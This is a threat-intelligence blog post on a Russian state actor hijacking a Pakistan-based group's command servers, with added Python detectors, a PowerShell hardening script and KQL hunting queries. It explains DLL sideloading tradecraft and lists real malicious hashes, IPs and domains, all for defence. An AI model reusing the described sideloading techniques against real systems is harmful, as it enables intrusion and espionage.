GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved.
Gartner, Magic Quadrant for Access Management, 2 December 2024, By Brian Guthrie, Nathan Harris, Abhyuday Data, Josh Murphy.
The post 8 years as a Leader in the Gartner® Magic Quadrant™ for Access Management appeared first on Microsoft Security Blog.
Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage
Based on both Microsoft Threat Intelligence’s findings and those reported by governments and other security vendors, we assess that the Russian nation-state actor tracked as Secret Blizzard has used the tools and infrastructure of at least six other threat actors during the past seven years. They also have actively targeted infrastructure where other threat actors have staged exfiltrated data from victims with the intention of collecting this data for their own espionage program. We assess that Secret Blizzard’s use of other actors’ infrastructure and tools, both state-sponsored and cybercriminal, is exclusively for facilitating espionage operations.
In this first of a two-part blog series, we discuss how Secret Blizzard has used the infrastructure of the Pakistan-based threat activity cluster we call Storm-0156 — which overlaps with the threat actor known as SideCopy, Transparent Tribe, and APT36 — to install backdoors and collect intelligence on targets of interest in South Asia. Microsoft Threat Intelligence partnered with Black Lotus Labs, the threat intelligence arm of Lumen Technologies, to confirm that Secret Blizzard command-and-control (C2) traffic emanated from Storm-0156 infrastructure, including infrastructure used by Storm-0156 to collate exfiltrated data from campaigns in Afghanistan and India. We thank the Black Lotus Team for recognizing the impact of this threat and collaborating on investigative efforts. In the second blog, Microsoft Threat Intelligence will be detailing how Secret Blizzard has used Amadey bots and the PowerShell backdoor of two other threat actors to deploy the Tavdig backdoor and then use that foothold to install their KazuarV2 backdoor on target devices in Ukraine.
Microsoft Threat Intelligence tracks Secret Blizzard campaigns and, when we are able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on Secret Blizzard’s activity to raise awareness of this threat actor’s tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity. In addition, we highlight that, while Secret Blizzard’s use of infrastructure and access by other threat actors is unusual, it is not unique. Therefore, organizations compromised by one threat actor may also find themselves compromised by another through the initial intrusion.
Who is Secret Blizzard?
The United States Cybersecurity and Infrastructure Security Agency (CISA) has attributed Secret Blizzard to Center 16 of Russia’s Federal Security Service (FSB), which is one of Russia’s Signals Intelligence and Computer Network Operations (CNO) services responsible for intercepting and decrypting electronic data as well as the technical penetration of foreign intelligence targets. Secret Blizzard overlaps with the threat actor tracked by other security vendors as Turla, Waterbug, Venomous Bear, Snake, Turla Team, and Turla APT Group.
Secret Blizzard is known for targeting a wide array of verticals, but most prominently ministries of foreign affairs, embassies, government offices, defense departments, and defense-related companies worldwide. Secret Blizzard focuses on gaining long-term access to systems for intelligence collection using extensive resources such as multiple backdoors, including some with peer-to-peer functionality and C2 communication channels. During intrusions, the threat actor collects and exfiltrates documents, PDFs, and email content. In general, Secret Blizzard seeks out information of political importance with a particular interest in advanced research that might impact international political issues. Campaigns where Secret Blizzard has used the tools or compromised infrastructure of other threat adversaries that have been publicly reported by other security vendors include:
- Accessing tools and infrastructure of Iranian state-sponsored threat actor Hazel Sandstorm (also called OilRig, APT-34 and Crambus) in 2017, as reported by Symantec and the US and UK intelligence services
- Reusing Andromeda malware to deploy the KopiLuwak and QuietCanary backdoors in 2022, as reported by Mandiant.
- Using the backdoor of the Kazakhstan-based threat actor tracked by Microsoft Threat Intelligence as Storm-0473, also called Tomiris, in an attempt to deploy QuietCanary in 2022, as reported by Kaspersky.
While not unique, leveraging the access of other adversaries is a somewhat unusual attack vector for threat actors in general. Secret Blizzard’s use of this technique highlights their approach to diversifying attack vectors, including using strategic web compromises (watering holes) and adversary-in-the-middle (AiTM) campaigns likely facilitated via legally mandated intercept systems in Russia such as the “System for Operative Investigative Activities” (SORM). More commonly, Secret Blizzard uses server-side and edge device compromises as initial attack vectors to facilitate further lateral movement within a network of interest.
Compromise and post-compromise activities
Since November 2022, Microsoft Threat Intelligence has observed Secret Blizzard compromising the C2 infrastructure of a Pakistan-based espionage cluster that we track as Storm-0156. Secret Blizzard has used Storm-0156’s backdoors to deploy their own backdoors to compromised devices. In addition, Secret Blizzard tools have been deployed to virtual private servers (VPS) staging Storm-0156’s exfiltrated data.
The initial access mechanism used by Secret Blizzard to compromise Storm-0156 infrastructure is currently not known. In some instances observed by Microsoft Threat Intelligence, Storm-0156 appeared to have used the C2 server for a considerable amount of time, while in other observed incidents Storm-0156 began accessing the VPS when Secret Blizzard deployed tools.
On the VPS used for C2, Storm-0156 operators consistently deploy a tool with the filename ArsenalV2%.exe. This is a server-side C2 tool that Microsoft Threat Intelligence refers to as Arsenal. Arsenal is an executable built on top of the cross-platform application development framework QtFramework, indicating it may also be deployed on operating systems other than Windows. Upon execution, Arsenal listens over a hardcoded port for incoming requests from controlled devices. Once connected, the tool enables threat actors to upload or download files to or from the device on which it is deployed.
When Arsenal is deployed, at least two SQLite3 databases, named ConnectionInfo.db and DownloadPriority.db, are set up. Arsenal uses these databases to store and look up information in different tables, such as:
- Uploaded files and a distinct username of the uploader
- Affected device information, including IP address, location, operating system version, and installed antivirus software
- Network connection events, duration of the session, and timestamps like the disconnect and connect time
Initially, Secret Blizzard deployed a fork of the TinyTurla backdoor to Storm-0156 C2 servers. However, since October 2023, Secret Blizzard predominantly has been using a .NET backdoor that Microsoft Threat Intelligence refers to as TwoDash alongside a clipboard monitoring tool referred to as Statuezy. Shortly after we observed the deployment of these capabilities, our partner Black Lotus Labs observed C2 communication from the Storm-0156 C2 infrastructure to dedicated Secret Blizzard C2s. This privileged position on Storm-0156 C2s has allowed Secret Blizzard to commandeer Storm-0156 backdoors such as CrimsonRAT, which was previously observed in Storm-0156 campaigns in 2023 and earlier, and a Storm-0156 Golang backdoor we refer to as Wainscot.
Storm-0156 extensively uses a renamed version (cridviz.exe, crezly.exe) of the Credential Backup and Restore Wizard, credwiz.exe, which is vulnerable to DLL sideloading, to load malicious payloads using the file name DUser.dll. Secret Blizzard often drops their own malicious payloads into a directory separate from that used by Storm-0156, but also uses credwiz.exe to load their malicious payload in a file called duser.dll. This DLL may contain a simple Meterpreter-like backdoor referred to as MiniPocket or the previously referenced TwoDash .NET backdoor. Secret Blizzard’s use of DLL sideloading with the same legitimate executable and malicious payloads with names similar to those used by Storm-0156 may indicate that Secret Blizzard attempts to masquerade as Storm-0156. Another search-order hijack used by Secret Blizzard is the deployment of TwoDash into the directory c:\windows\system32 with the filename oci.dll and then using the Distributed Transaction Coordinator, msdtc.exe, which is part of the default Windows installation, to sideload the malicious payload in oci.dll as described by a Penetration Testing Lab blog published in 2020.
Figure 1. Secret Blizzard and Storm-0156 chain of compromise
In August 2024, Microsoft observed Secret Blizzard using a CrimsonRAT compromise that Storm-0156 had established in March 2024. Secret Blizzard is assessed to have commandeered the CrimsonRAT backdoor to download and execute Secret Blizzard’s TwoDash backdoor. Additionally, Microsoft observed instances of Secret Blizzard accessing Storm-0156’s CrimsonRAT on target devices in India. One of these CrimsonRAT deployments was configured with a C2 server at Contabo (ur253.duckdns[.]org: 45.14.194[.]253), where Secret Blizzard had deployed the clipboard monitor tool in January, February, and September 2024. Between May and August 2024, Black Lotus Labs confirmed network activity indicating backdoor communication from this same CrimsonRAT C2 to known Secret Blizzard infrastructure.
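Defender-side hunting logic for the two sideloading chains just described, as an added example that is not code from this post or from Microsoft. It runs over constructed Sysmon-style image-load records (Event ID 7 field names; the hosts, paths and events themselves are invented here), flags a credwiz.exe binary, renamed or not and identified by its OriginalFileName, that loads DUser.dll from anywhere outside System32, and flags msdtc.exe loading oci.dll. The genuine credwiz.exe legitimately loads the genuine duser.dll from System32, so that pairing alone is not alerted on; a default Windows installation ships no oci.dll at all, so any load of it by msdtc.exe is worth review wherever the file sits.

```python
"""Hunt for the credwiz.exe/DUser.dll and msdtc.exe/oci.dll search-order
hijacks in Sysmon-style image-load events (Event ID 7).

The records below are constructed sample data for this example, not real
telemetry; only the field names (Image, OriginalFileName, ImageLoaded) follow
Sysmon's naming.
"""
from __future__ import annotations

import ntpath  # Windows path handling that also works on non-Windows hosts

SYSTEM32 = r"c:\windows\system32"

# Constructed sample events (hypothetical hosts and paths).
SAMPLE_EVENTS = [
    # Benign: the real credwiz.exe loading the real DirectUI duser.dll.
    {"Image": r"C:\Windows\System32\credwiz.exe", "OriginalFileName": "credwiz.exe",
     "ImageLoaded": r"C:\Windows\System32\duser.dll"},
    # Suspicious: renamed copy (OriginalFileName still credwiz.exe) loading
    # DUser.dll from a user-writable directory.
    {"Image": r"C:\Users\Public\cridviz.exe", "OriginalFileName": "credwiz.exe",
     "ImageLoaded": r"C:\Users\Public\DUser.dll"},
    # Suspicious: msdtc.exe loading oci.dll, which Windows does not ship.
    {"Image": r"C:\Windows\System32\msdtc.exe", "OriginalFileName": "msdtc.exe",
     "ImageLoaded": r"C:\Windows\System32\oci.dll"},
    # Benign, unrelated load.
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll"},
]


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _directory(path: str) -> str:
    return ntpath.dirname(path).lower()


def classify(event: dict) -> str | None:
    """Return a detection tag for one image-load event, or None if benign."""
    image = event["Image"]
    original = event.get("OriginalFileName", "").lower()
    loaded = event["ImageLoaded"]

    # Hijack 1: credwiz.exe pulling DUser.dll. Alert if the binary has been
    # renamed (cridviz.exe, crezly.exe, ...) or the DLL comes from outside
    # System32; the legitimate pairing inside System32 is left alone.
    if original == "credwiz.exe" and _name(loaded) == "duser.dll":
        renamed = _name(image) != "credwiz.exe"
        if renamed or _directory(loaded) != SYSTEM32:
            return "credwiz-duser-sideload"

    # Hijack 2: msdtc.exe loading oci.dll. No default Windows install ships
    # oci.dll, so the load itself is the signal, regardless of directory.
    if original == "msdtc.exe" and _name(loaded) == "oci.dll":
        return "msdtc-oci-sideload"

    return None


def hunt(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (process, dll, tag) for every event that classify() flags."""
    return [(e["Image"], e["ImageLoaded"], tag)
            for e in events if (tag := classify(e))]


if __name__ == "__main__":
    for image, dll, tag in hunt(SAMPLE_EVENTS):
        print(f"{tag}: {image} -> {dll}")
```

The OriginalFileName check is what makes the renamed-binary case catchable: the PE version resource still says credwiz.exe even when the file on disk is called cridviz.exe, and Sysmon records that field for the loading process.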
Secret Blizzard backdoors deployed on Storm-0156 infrastructure
TinyTurla variant
Similar to the TinyTurla backdoor reported by Cisco Talos in 2021, the TinyTurla variant is installed using a batch file and disguises itself as a Windows-based service. The batch file also configures a variety of registry keys used by the malware including Delay (sleep time), Key (public key), and Hosts (C2 addresses).
Figure 2. mp.bat file containing configuration parameters for the TinyTurla variant
While there is not complete feature parity between the TinyTurla variant sample and the sample analyzed by Cisco Talos, there are significant functional and code overlaps.
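A matching check for the service-based persistence described above, as an added example that is not code from this post or from Microsoft. It groups constructed Sysmon-style registry value-set records (Event ID 13) by service and reports any service whose configuration receives all three value names the post lists, Delay, Key and Hosts, together with the processes that wrote them, so an analyst can confirm whether a batch file did the writing. The service names, key paths and events are invented for the example, and the placement of the values under the service's Parameters subkey is an assumption carried over from the earlier public TinyTurla analysis, not something this post states.

```python
"""Flag services whose registry configuration receives the Delay, Key and
Hosts values described for the TinyTurla variant.

Input is a list of constructed Sysmon-style registry value-set events
(Event ID 13: Image, TargetObject, Details). Service names and paths are
invented for this example; the Parameters subkey location is an assumption.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Match ...\Services\<name>\Parameters\<Delay|Key|Hosts>; the Parameters
# subkey placement is assumed, not stated by the post.
SERVICE_VALUE = re.compile(
    r"\\services\\([^\\]+)\\parameters\\(delay|key|hosts)$", re.IGNORECASE)
REQUIRED = {"delay", "key", "hosts"}

_SVC = r"HKLM\System\CurrentControlSet\Services"

# Constructed sample events (hypothetical service names and values).
SAMPLE_EVENTS = [
    # A batch file (cmd.exe) configuring a fake service "UpdSvcExample".
    {"Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": _SVC + r"\UpdSvcExample\Parameters\Delay",
     "Details": "DWORD (0x0000003c)"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": _SVC + r"\UpdSvcExample\Parameters\Key",
     "Details": "Binary Data"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": _SVC + r"\UpdSvcExample\Parameters\Hosts",
     "Details": "example-c2.invalid"},
    # A legitimate-looking service that only ever sets a Hosts value.
    {"Image": r"C:\Windows\System32\services.exe",
     "TargetObject": _SVC + r"\SomeOtherSvc\Parameters\Hosts",
     "Details": "time.example.invalid"},
    # Unrelated registry write.
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Example\Setting",
     "Details": "1"},
]


def find_tinyturla_like_services(events: list[dict]) -> dict[str, list[str]]:
    """Return {service_name: [writer processes]} for every service that
    received all of Delay, Key and Hosts. Names are lower-cased."""
    values_seen: dict[str, set[str]] = defaultdict(set)
    writers: dict[str, set[str]] = defaultdict(set)
    for event in events:
        match = SERVICE_VALUE.search(event["TargetObject"])
        if not match:
            continue
        service, value = match.group(1).lower(), match.group(2).lower()
        values_seen[service].add(value)
        writers[service].add(event["Image"].lower())
    return {service: sorted(writers[service])
            for service, values in values_seen.items()
            if REQUIRED <= values}


if __name__ == "__main__":
    for service, procs in find_tinyturla_like_services(SAMPLE_EVENTS).items():
        print(f"service {service!r} configured with Delay/Key/Hosts by {procs}")
```

Requiring all three value names keeps the rule from firing on ordinary services that happen to store a Hosts or Delay value; the writer list is returned rather than filtered on cmd.exe so the analyst sees the installing process whatever it was.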
TwoDashTwoDash is a custom downloader comprised of two main components: a native Win32/64 PE file and a .NET application. The native binary acts as a loader for the .NET application which it decrypts and executes. The .NET application conducts a basic device survey and sends this information to the configured C2 servers. Finally, it waits for follow-on tasks, which are compiled as additional .NET assemblies/modules.
StatuezyStatuezy is a custom trojan that monitors and logs data saved to the Windows clipboard. Each time the clipboard is updated with new data, the trojan saves the current timestamp, associated clipboard format (such as CF_TEXT), and the clipboard data itself to a temporary file which we assess is exfiltrated by a separate malware family.
MiniPocketMiniPocket is a small custom downloader that connects to a hardcoded IP address/port using TCP to retrieve and execute a second-stage binary.
Storm-0156 backdoors used in this campaign WainscotWainscot is a Golang-based backdoor seen in the wild since at least October 2023. This backdoor can handle various commands from C2, including launching arbitrary commands, uploading and downloading files, and taking screenshots on the target host. Though Microsoft Threat Intelligence has primarily observed this backdoor targeting Windows users, we also have identified public reports of a possible Wainscot variant targeting Linux-based platforms. Interestingly, this Linux variant has far more features than the Windows variant.
CrimsonRATCrimsonRAT is a .NET-based backdoor with varied capabilities that has gone through multiple iterations over the years. The most recent variant of CrimsonRAT analyzed by Microsoft Threat Intelligence can gather system information, list running processes, file information, download or upload files, and execute arbitrary commands on target. We also have observed CrimsonRAT dropping additional modules to act as a keylogger on the target host.
Who has been affected by Secret Blizzard’s compromises using Storm-0156 infrastructure?
In Afghanistan, Secret Blizzard generally has used their positions on Storm-0156 C2 servers to deploy backdoors to devices within the extended Afghan government—including the Ministry of Foreign Affairs, the General Directorate of Intelligence (GDI), and foreign consulates of the government of Afghanistan. In each of these cases, we observed the deployment of Storm-0156 backdoors which were subsequently used to download the Secret Blizzard tools to target devices in Afghanistan.
In India, Secret Blizzard generally appears to have avoided direct deployment via Storm-0156 backdoors, instead deploying Secret Blizzard backdoors to C2 servers or Storm-0156 servers hosting data exfiltrated from Indian military and defense-related institutions. We observed only one instance of Secret Blizzard using a Storm-0156 backdoor to deploy the TwoDash backdoor to a target desktop in India. The difference in Secret Blizzard’s approach in Afghanistan and India could reflect political considerations within the Russian leadership, differing geographical areas of responsibility within the FSB, or a collection gap on Microsoft Threat Intelligence’s part.
Conclusion
The frequency of Secret Blizzard’s operations to co-opt or commandeer the infrastructure or tools of other threat actors suggests that this is an intentional component of Secret Blizzard’s tactics and techniques. Leveraging this type of resource has both advantages and drawbacks. Taking advantage of the campaigns of others allows Secret Blizzard to establish footholds on networks of interest with relatively minimal effort. However, because these initial footholds are established on another threat actor’s targets of interest, the information obtained through this technique may not align entirely with Secret Blizzard’s collection priorities. In addition, if the threat actor that established the initial foothold has poor operational security, this technique might trigger endpoint or network security alerts on the tools deployed by the actor conducting the initial compromise, resulting in unintended exposure of Secret Blizzard activity.
Mitigation and protection guidance
To harden networks against the Secret Blizzard activity listed above, defenders can implement the following:
Strengthen Microsoft Defender for Endpoint configuration
- Microsoft Defender XDR customers can implement attack surface reduction rules to harden an environment against techniques used by threat actors
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Enable network protection in Microsoft Defender for Endpoint
- Ensure tamper protection is enabled in Microsoft Defender for Endpoint
- Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume
- Turn on PUA protection in block mode in Microsoft Defender Antivirus
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving threat actor tools and techniques
- Turn on Microsoft Defender Antivirus real-time protection
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware
- Implement PowerShell execution policies to control conditions under which PowerShell can load configuration files and run scripts
- Turn on and monitor PowerShell module and script block logging
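As an added example (not code from the Microsoft post), the following script audits a Windows endpoint against the locally configurable items in the list above and, with -Apply, sets them; tamper protection and EDR block mode are only reported because they are managed from the Defender portal or Intune. It assumes the Defender PowerShell module is present, that AllSigned is the execution policy you want, and that PowerShell logging is enforced through the registry policy paths shown.

```powershell
#Requires -RunAsAdministrator
<#
  Added example, not code from the Microsoft post: audit a Windows endpoint against
  the locally configurable items in the hardening list above and, with -Apply,
  set them. Tamper protection and EDR block mode are managed from the Defender
  portal or Intune, so they are reported but not changed. Assumptions: the
  Defender PowerShell module is present, AllSigned is the execution policy you
  want, and the registry policy paths below are where logging is enforced.
#>
[CmdletBinding()]
param(
    [switch]$Apply   # report only unless -Apply is given
)

# Documented ASR rule ID for "Block executable files from running unless they
# meet a prevalence, age, or trusted list criterion".
$AsrBlockUntrustedExe = '01443614-cd74-433a-b99e-2ecdc07bfc25'
$PsPolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

$pref     = Get-MpPreference
$status   = Get-MpComputerStatus
$findings = New-Object 'System.Collections.Generic.List[string]'

function Test-Setting {
    param([string]$Name, [bool]$Ok, [scriptblock]$Fix)
    if ($Ok) { Write-Host "[OK]   $Name"; return }
    $findings.Add($Name)
    if ($Apply -and $Fix) { & $Fix; Write-Host "[FIX]  $Name" }
    else                  { Write-Host "[WARN] $Name" }
}

# --- Microsoft Defender Antivirus settings (Set-MpPreference) ---------------
Test-Setting 'Real-time protection enabled' (-not $pref.DisableRealtimeMonitoring) `
    { Set-MpPreference -DisableRealtimeMonitoring $false }

# MAPSReporting: 0 = off, 1 = basic, 2 = advanced (cloud-delivered protection)
Test-Setting 'Cloud-delivered protection (MAPS advanced)' ($pref.MAPSReporting -eq 2) `
    { Set-MpPreference -MAPSReporting Advanced }

# PUAProtection: 0 = off, 1 = block, 2 = audit
Test-Setting 'PUA protection in block mode' ($pref.PUAProtection -eq 1) `
    { Set-MpPreference -PUAProtection Enabled }

# EnableNetworkProtection: 0 = off, 1 = block, 2 = audit
Test-Setting 'Network protection in block mode' ($pref.EnableNetworkProtection -eq 1) `
    { Set-MpPreference -EnableNetworkProtection Enabled }

# ASR rule state: look the rule up by ID (case-insensitive); action 1 = block
$asrIds     = @($pref.AttackSurfaceReductionRules_Ids)
$asrActions = @($pref.AttackSurfaceReductionRules_Actions)
$idx = -1
for ($i = 0; $i -lt $asrIds.Count; $i++) {
    if ($asrIds[$i] -ieq $AsrBlockUntrustedExe) { $idx = $i }
}
Test-Setting 'ASR rule: block executables that fail prevalence/age/trusted-list criteria' `
    ($idx -ge 0 -and $asrActions[$idx] -eq 1) `
    { Add-MpPreference -AttackSurfaceReductionRules_Ids $AsrBlockUntrustedExe `
                       -AttackSurfaceReductionRules_Actions Enabled }

# --- Items managed from the Defender portal or Intune: report only ---------
Test-Setting 'Tamper protection enabled' ([bool]$status.IsTamperProtected) $null
# AMRunningMode is "Passive Mode" when a non-Microsoft AV is primary and EDR block mode is off
Test-Setting "Defender active or in EDR block mode (AMRunningMode: $($status.AMRunningMode))" `
    ($status.AMRunningMode -in @('Normal', 'EDR Block Mode')) $null

# --- PowerShell logging and execution policy --------------------------------
function Get-PolicyDword([string]$SubKey, [string]$Name) {
    $item = Get-ItemProperty -Path (Join-Path $PsPolicyRoot $SubKey) -Name $Name -ErrorAction SilentlyContinue
    if ($item) { [int]$item.$Name } else { 0 }
}
function Set-PolicyDword([string]$SubKey, [string]$Name, [int]$Value) {
    $path = Join-Path $PsPolicyRoot $SubKey
    New-Item -Path $path -Force | Out-Null
    New-ItemProperty -Path $path -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
}

Test-Setting 'Script block logging enabled (event ID 4104)' `
    ((Get-PolicyDword 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1) `
    { Set-PolicyDword 'ScriptBlockLogging' 'EnableScriptBlockLogging' 1 }

Test-Setting 'Module logging enabled for all modules (event ID 4103)' `
    ((Get-PolicyDword 'ModuleLogging' 'EnableModuleLogging') -eq 1) `
    {
        Set-PolicyDword 'ModuleLogging' 'EnableModuleLogging' 1
        $names = Join-Path $PsPolicyRoot 'ModuleLogging\ModuleNames'
        New-Item -Path $names -Force | Out-Null
        New-ItemProperty -Path $names -Name '*' -PropertyType String -Value '*' -Force | Out-Null
    }

$ep = Get-ExecutionPolicy -Scope LocalMachine
Test-Setting "Machine execution policy restricts unsigned scripts (current: $ep)" `
    ($ep -in @('AllSigned', 'RemoteSigned')) `
    { Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force }

if ($findings.Count -eq 0) { Write-Host 'All checked items are compliant.' }
else { Write-Host "$($findings.Count) item(s) need attention; rerun with -Apply to set those configurable locally." }
```

Settings applied with Set-MpPreference can still be overridden by Group Policy or Intune, so confirm the result with Get-MpPreference after the next policy refresh.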
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
- Backdoor:Win64/Wainscot
- Backdoor:MSIL/CrimsonRat.A
- Backdoor:MSIL/CrimsonRat.B
- TrojanSpy:MSIL/CrimsonRat.A
- TrojanDownloader:Win64/TwoDash
- Trojan:MSIL/ReverseRAT
- Trojan:Win32/TinStrut.A
- Trojan:Win64/TinyTurla.A
- Trojan:Win64/TinyTurla.B
- Trojan:Win32/MiniPocket.A
- TrojanDownloader:Win64/TwoDash.A
- Trojan:Win64/TwoDash.B
- Trojan:Win64/PostGallery.A
- Trojan:Win32/Statuezy.B
- Trojan:Win32/TinyTurla
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
- Secret Blizzard Actor activity detected
The following alerts might also indicate threat activity related to this threat. Note, however, these alerts also can be triggered by unrelated threat activity.
- An executable file loaded an unexpected DLL file
- Process loaded suspicious .NET assembly
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.
Microsoft Defender Threat Intelligence
Hunting queries
Microsoft Defender XDR
The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go to the Advanced hunting page > Query tab, select the calendar dropdown menu to update your query to hunt for the Last 30 days.
Storm-0156 compromise-associated malware
Surface events that may have involved Storm-0156 compromise-associated malware.
```kusto
let fileHashes = dynamic([
    "e298b83891b192b8a2782e638e7f5601acf13bab2f619215ac68a0b61230a273",
    "08803510089c8832df3f6db57aded7bfd2d91745e7dd44985d4c9cb9bd5fd1d2",
    "aba8b59281faa8c1c43a4ca7af075edd3e3516d3cef058a1f43b093177b8f83c",
    "7c4ef30bd1b5cb690d2603e33264768e3b42752660c79979a5db80816dfb2ad2",
    "dbbf8108fd14478ae05d3a3a6aabc242bff6af6eb1e93cbead4f5a23c3587ced",
    "7c7fad6b9ecb1e770693a6c62e0cc4183f602b892823f4a451799376be915912",
    "e2d033b324450e1cb7575fedfc784e66488e342631f059988a9a2fd6e006d381",
    "C039ec6622393f9324cacbf8cfaba3b7a41fe6929812ce3bd5d79b0fdedc884a",
    "59d7ec6ec97c6b958e00a3352d38dd13876fecdb2bb13a8541ab93248edde317"
]);
// in~ is the case-insensitive form of in: one hash in the list is written in
// upper case, while the SHA256 columns hold lower-case hex.
union
    (DeviceFileEvents      | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"),
    (DeviceEvents          | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"),
    (DeviceImageLoadEvents | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"),
    (DeviceProcessEvents   | where SHA256 in~ (fileHashes) | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents")
| order by Timestamp desc
```
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Search for file-based IOCs:
```kusto
let selectedTimestamp = datetime(2024-10-17T00:00:00.0000000Z);
let fileName = dynamic(["hubstck.exe","auddrv.exe","lustsorelfar.exe","duser.dll","mfmpef.exe","MpSvcS.dll","WinHttpSvc.dll","regsvr.exe"]);
let FileSHA256 = dynamic([
    "e298b83891b192b8a2782e638e7f5601acf13bab2f619215ac68a0b61230a273",
    "08803510089c8832df3f6db57aded7bfd2d91745e7dd44985d4c9cb9bd5fd1d2",
    "aba8b59281faa8c1c43a4ca7af075edd3e3516d3cef058a1f43b093177b8f83c",
    "7c4ef30bd1b5cb690d2603e33264768e3b42752660c79979a5db80816dfb2ad2",
    "dbbf8108fd14478ae05d3a3a6aabc242bff6af6eb1e93cbead4f5a23c3587ced",
    "7c7fad6b9ecb1e770693a6c62e0cc4183f602b892823f4a451799376be915912",
    "e2d033b324450e1cb7575fedfc784e66488e342631f059988a9a2fd6e006d381",
    "C039ec6622393f9324cacbf8cfaba3b7a41fe6929812ce3bd5d79b0fdedc884a",
    "59d7ec6ec97c6b958e00a3352d38dd13876fecdb2bb13a8541ab93248edde317"
]);
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)
    // from October 17th runs the search for the following 90 days; change selectedTimestamp or 90d accordingly
    TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
    // in~ makes the hash comparison case-insensitive (one listed hash is upper case)
    and (FileName in (fileName) or OldFileName in (fileName) or ProfileName in (fileName) or InitiatingProcessFileName in (fileName) or InitiatingProcessParentFileName in (fileName) or InitiatingProcessVersionInfoInternalFileName in (fileName) or InitiatingProcessVersionInfoOriginalFileName in (fileName) or PreviousFileName in (fileName) or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName) or ServiceFileName in (fileName) or SHA256 in~ (FileSHA256) or InitiatingProcessSHA256 in~ (FileSHA256))
```
Search for network IOCs:
```kusto
let selectedTimestamp = datetime(2024-10-17T00:00:00.0000000Z);
let ip = dynamic([
    "94.177.198.94","162.213.195.129","46.249.58.201","95.111.229.253","146.70.158.90",
    "143.198.73.108","161.35.192.207","91.234.33.48","154.53.42.194","38.242.207.36",
    "167.86.118.69","164.68.108.153","144.91.72.17","130.185.119.198","176.57.184.97",
    "173.212.252.2","209.126.11.251","45.14.194.253","37.60.236.186","5.189.183.63",
    "109.123.244.46"
]);
let url = dynamic(["connectotels.net","hostelhotels.net","ur253.duckdns.org"]);
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceInfo,DeviceNetworkEvents,DeviceNetworkInfo,DnsEvents,SecurityEvent,VMConnection,WindowsFirewall)
    // from October 17th runs the search for the following 90 days; change selectedTimestamp or 90d accordingly
    TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
    and (RemoteIP in (ip) or DestinationIP in (ip) or DeviceCustomIPv6Address1 in (ip) or DeviceCustomIPv6Address2 in (ip) or DeviceCustomIPv6Address3 in (ip) or DeviceCustomIPv6Address4 in (ip) or MaliciousIP in (ip) or SourceIP in (ip) or PublicIP in (ip) or LocalIPType in (ip) or RemoteIPType in (ip) or IPAddresses in (ip) or IPv4Dhcp in (ip) or IPv6Dhcp in (ip) or IpAddress in (ip) or NASIPv4Address in (ip) or NASIPv6Address in (ip) or RemoteIpAddress in (ip) or RemoteUrl in (url))
```
Indicators of compromise
Storm-0156 compromise-associated malware
References
- https://attack.mitre.org/groups/G1008/
- https://attack.mitre.org/groups/G0134/
